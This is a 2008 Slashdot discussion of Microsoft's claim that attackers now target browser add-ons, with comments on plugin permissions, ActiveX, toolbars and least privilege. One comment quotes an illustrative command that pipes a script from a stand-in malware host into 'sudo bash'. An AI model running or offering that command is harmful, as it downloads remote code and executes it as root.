Microsoft Blames Add-Ons For Browser Woes

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"
  • Duh (Score:5, Insightful)

    by Drinking Bleach ( 975757 ) on Friday November 21, 2008 @05:01PM (#25850749)

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  • by retech ( 1228598 ) on Friday November 21, 2008 @05:01PM (#25850759)
    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've missed some.
  • Permissions (Score:5, Insightful)

    by gurps_npc ( 621217 ) on Friday November 21, 2008 @05:02PM (#25850773) Homepage
    And if the add-ons were given far more permission than they actually need? If the browser works right, then the damage a poorly written add-on can do should be minimal.
  • by bigstrat2003 ( 1058574 ) * on Friday November 21, 2008 @05:02PM (#25850775)

    The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

    This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

  • But remember (Score:5, Insightful)

    by dedazo ( 737510 ) on Friday November 21, 2008 @05:03PM (#25850789) Journal

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

  • Re:Permissions (Score:5, Insightful)

    by geirnord ( 150896 ) on Friday November 21, 2008 @05:07PM (#25850863)

    I second that! Somewhere along the line add-ons got way too many permissions. Why on earth does Adobe Flash have access to my webcam and hard drive?!?

  • by tjstork ( 137384 ) <todd DOT bandrowsky AT gmail DOT com> on Friday November 21, 2008 @05:08PM (#25850875) Homepage Journal

    Microsoft made add-ons essentially super-user in the browser space, and now they complain about add-ons being ill-behaved? If you don't want kids to bang their heads on your playground, perhaps design it better?

  • by syousef ( 465911 ) on Friday November 21, 2008 @05:09PM (#25850899) Journal

    Many non-power-users don't use addons at all.

    If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

  • Tied down! (Score:2, Insightful)

    by Anonymous Coward on Friday November 21, 2008 @05:11PM (#25850955)

    Its browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!

  • by EvanED ( 569694 ) <{evaned} {at} {gmail.com}> on Friday November 21, 2008 @05:12PM (#25850975)

    Many non-power-users don't use addons at all.

    And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

  • by SQLGuru ( 980662 ) on Friday November 21, 2008 @05:13PM (#25850981) Homepage Journal

    How about a car analogy?

    If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.

    Layne

  • by athakur999 ( 44340 ) on Friday November 21, 2008 @05:14PM (#25851019) Journal

    Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

    If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

  • excuses (Score:1, Insightful)

    by danielt998 ( 1348307 ) on Friday November 21, 2008 @05:17PM (#25851049)
    Microsoft are just looking for any excuse to hide the fact that IE is really insecure and crap.
  • by Anonymous Coward on Friday November 21, 2008 @05:17PM (#25851057)

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  • by Anonymous Coward on Friday November 21, 2008 @05:17PM (#25851065)

    Not knowingly you mean. Most users who don't know much about computers I find have at least 5 different toolbars from various software vendors including but not limited to yahoo, google and adobe. It seems that every fucking program nowadays has some stupid browser toolbar/addon shit tacked onto it you need to tell the installer to NOT FUCKING INSTALL or it will take over your browser.

  • by Ethanol-fueled ( 1125189 ) * on Friday November 21, 2008 @05:23PM (#25851167) Homepage Journal
    Finally!

    28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

    Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!
  • Plugin model (Score:5, Insightful)

    by Enderandrew ( 866215 ) <enderandrew&gmail,com> on Friday November 21, 2008 @05:25PM (#25851197) Homepage Journal

    Aren't they responsible for the plugin model in their browser? Aren't they responsible for the OS security?

    Take a look at how Chrome handles plugins and then try to pass the buck.

  • by Sloppy ( 14984 ) on Friday November 21, 2008 @05:37PM (#25851393) Homepage Journal

    The biggest part of internet security is paying attention to where you go.

    I would agree with you, if "going" to a malware site meant

    curl ftp://malwaresite.com/malware.sh | sudo bash

    Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

    "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

  • by joeflies ( 529536 ) on Friday November 21, 2008 @05:39PM (#25851423)

    I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent someone from taking over your machine.

    You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting mugged. But that doesn't make you mugging-proof.

  • by Anonymous Coward on Friday November 21, 2008 @05:55PM (#25851657)

    no one knows if their computer is clean

    BINGO, motherfucker.

  • by bigstrat2003 ( 1058574 ) * on Friday November 21, 2008 @05:58PM (#25851717)

    Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

    Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.

  • What a joke (Score:1, Insightful)

    by Anonymous Coward on Friday November 21, 2008 @06:00PM (#25851751)

    Yes it's not their fault that Vista was a fuck up. It's not their fault that it takes half an hour to upgrade to IE7.
    It's not as if we should care that the Internet is in a dark age for the last 7 years..

  • ABM (Score:3, Insightful)

    by YetAnotherBob ( 988800 ) on Friday November 21, 2008 @06:08PM (#25851865)

    This is marketing. Blame ABM, Anybody But Microsoft.

    Truth is that IE is not the best browser, but is better than it was.

    Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.

    Why is any of this news? It is really just a marketing department's attempt to deflect blame away from where it belongs.

  • by Kamokazi ( 1080091 ) on Friday November 21, 2008 @06:14PM (#25851937)

    To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):

    -I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.

    -IE7 is definitely a standard-ignoring bastard. And assuming you're an FF advocate, remember it didn't pass Acid2 until FF3. And IE8 is shipping in a standard-compliant mode by default, which should help all browsers out.

    -Sluggish...compared to FF3 and Opera. But it was faster than FF2 for several different languages...so then FF2 was also sluggish, by your standards.

    -Bloated? How? I really don't see any bloat compared to other browsers.

    -What features do you expect from it out of the box? Seems to do about the same as the others, plus or minus some minor stuff.

    (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

  • Re:But remember (Score:2, Insightful)

    by xant ( 99438 ) on Friday November 21, 2008 @06:25PM (#25852111) Homepage

    I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser.

    They were able to fix it to some degree, but all it's doing is preventing poorly-written addons from leaking memory. I think protecting the user from his addons is a superior technical solution, but it isn't Firefox's "fault" that the addons were written poorly.

    And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing problems? Disable the plugins, not IE. Drivers making windows bluescreen? Blame the drivers, not Windows.

    But still try to sandbox things a little better so buggy extension code doesn't kill the experience.

  • by BlueParrot ( 965239 ) on Friday November 21, 2008 @06:28PM (#25852153)

    Now let's see... why is it that we need addons for something as simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.

  • Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to have no problem doing this, so why can't Windows?

  • Re:Permissions (Score:5, Insightful)

    by MadnessASAP ( 1052274 ) <madnessasap@gmail.com> on Friday November 21, 2008 @06:41PM (#25852319)

    Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use Windows outside of very carefully controlled office and school environments without Administrator access is impossible.

  • Re:Permissions (Score:4, Insightful)

    by legirons ( 809082 ) on Friday November 21, 2008 @06:43PM (#25852349)

    IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.

    Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)

    Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)

  • by Zerimar ( 1124785 ) on Friday November 21, 2008 @07:45PM (#25853179)
    No matter how many times I remove Google and Yahoo toolbars from my Dad's PC, it always gets reinstalled. Too many freeware apps come with it "pre-checked" during installation, and too many users just click "Yes" or "OK" on every prompt.
  • Re:Permissions (Score:3, Insightful)

    by petermgreen ( 876956 ) <plugwash@nOSpam.p10link.net> on Friday November 21, 2008 @09:48PM (#25854347) Homepage

    Why do Mac users and Linux users manage to avoid most of this shit?
    I think there are two reasons

    1: there is simply less shit available for their platform
    2: Mac and Linux users tend to be more experienced and discerning. Nearly all newbies use Windows

  • by betelgeuse68 ( 230611 ) on Friday November 21, 2008 @10:20PM (#25854567)

    But tell me FreakinSyco... how many people, think Joe and Jane Sixpack run with non-administrative accounts at home under Windows XP?

    Even worse, 99% of IT people will do the same, i.e. rely on anti-virus vs. the principle of least privilege which they'll call out in a heartbeat on *NIX ("Don't run as root!!!") but fail to do the same when at home under Windows XP. It's largely a user education issue. Few people know about the tools Windows does offer and assume it's completely insecure (that's not true).

    Further, lots of Windows software has assumed the user DOES have administrative privileges. At one point in time Google Desktop would simply not run in a non-admin desktop. Other software dating back to Windows 9x was also guilty of this. Until a couple of years ago Winamp failed to run if you were not an administrator. Why? Because it stored its configuration (Winamp.ini) in C:\Windows and it maintained global settings for the entire machine via the deprecated GetPrivateProfileString and WritePrivateProfileString APIs dating back to Windows 3.x.

    Do you think your average user would likely have such information? Or even care? They just want software to work!

    This tool is a compromise. 1) People don't like passwords. 2) Most Windows XP users run as administrators with nary an understanding of the dangers; getting them to change to a non-admin account has many, MANY barriers. 3) This tool is a compromise.

    If you run as "god"/root/administrator then by proxy as your browser pulls in crap off the Net, guess what's going to happen? Yes, security issues will persist, such as cross site scripting, but which would you rather have, a browser flaw that at most might steal some file on your system or getting your machine instrumented with a root kit? No system is 100% secure but the key is to minimize exposure.

    RemoveAdmin leverages a security API that's actually part of Windows Vista as well. If you have an end user that has foolishly turned off UAC, this tool will work there. It will also work with Windows 2000.

    -M

  • Re:Permissions (Score:5, Insightful)

    by SanityInAnarchy ( 655584 ) <ninja@slaphack.com> on Saturday November 22, 2008 @03:54AM (#25856115) Journal

    Just in case anyone was going to interpret this literally:

    Ideally, most of these plugins should be setuid as nobody

    No, no, a thousand times no!

    I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.

    These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.

    The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.

    In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.

    But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!
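
The shared-"nobody" problem described in the comment above, shown as an added example (not part of the original post): it groups a process listing by account and reports every pair of different programs that share a uid. Both listings are constructed samples laid out like `ps -eo pid,user:16,comm` output, and the per-plugin account names are hypothetical.

```python
from collections import defaultdict
from itertools import combinations

# Constructed sample (not real system output): three services all run as nobody.
PS_SHARED_NOBODY = """\
  PID USER             COMMAND
  812 nobody           flash-plugin
  815 nobody           java-plugin
  901 nobody           httpd-helper
 1044 alice            firefox
"""

# Same processes after each one gets its own account (hypothetical account names).
PS_PER_PLUGIN = """\
  PID USER             COMMAND
  812 flash-plugin     flash-plugin
  815 java-plugin      java-plugin
  901 httpd-helper     httpd-helper
 1044 alice            firefox
"""


def parse_ps(text):
    """Return (pid, user, command) tuples from ps-style text, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append((int(parts[0]), parts[1], parts[2].strip()))
    return rows


def shared_uid_exposure(rows):
    """Map each account to the pairs of different programs running under it.

    An unprivileged Unix process may signal (and, where ptrace is not
    restricted, trace) any process with the same uid, so every pair is a
    path from one compromised program to the other.
    """
    by_user = defaultdict(set)
    for _pid, user, comm in rows:
        by_user[user].add(comm)
    exposure = {}
    for user, comms in by_user.items():
        pairs = list(combinations(sorted(comms), 2))
        if pairs:
            exposure[user] = pairs
    return exposure


if __name__ == "__main__":
    for label, listing in (("shared nobody", PS_SHARED_NOBODY),
                           ("per-plugin users", PS_PER_PLUGIN)):
        print(label, shared_uid_exposure(parse_ps(listing)))
```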

  • Re:Permissions (Score:1, Insightful)

    by Anonymous Coward on Saturday November 22, 2008 @05:47AM (#25856421)

    Typical business users run with the (default) flag "hide extensions for known filetypes" and use "Import" when they need a .txt file in Excel.
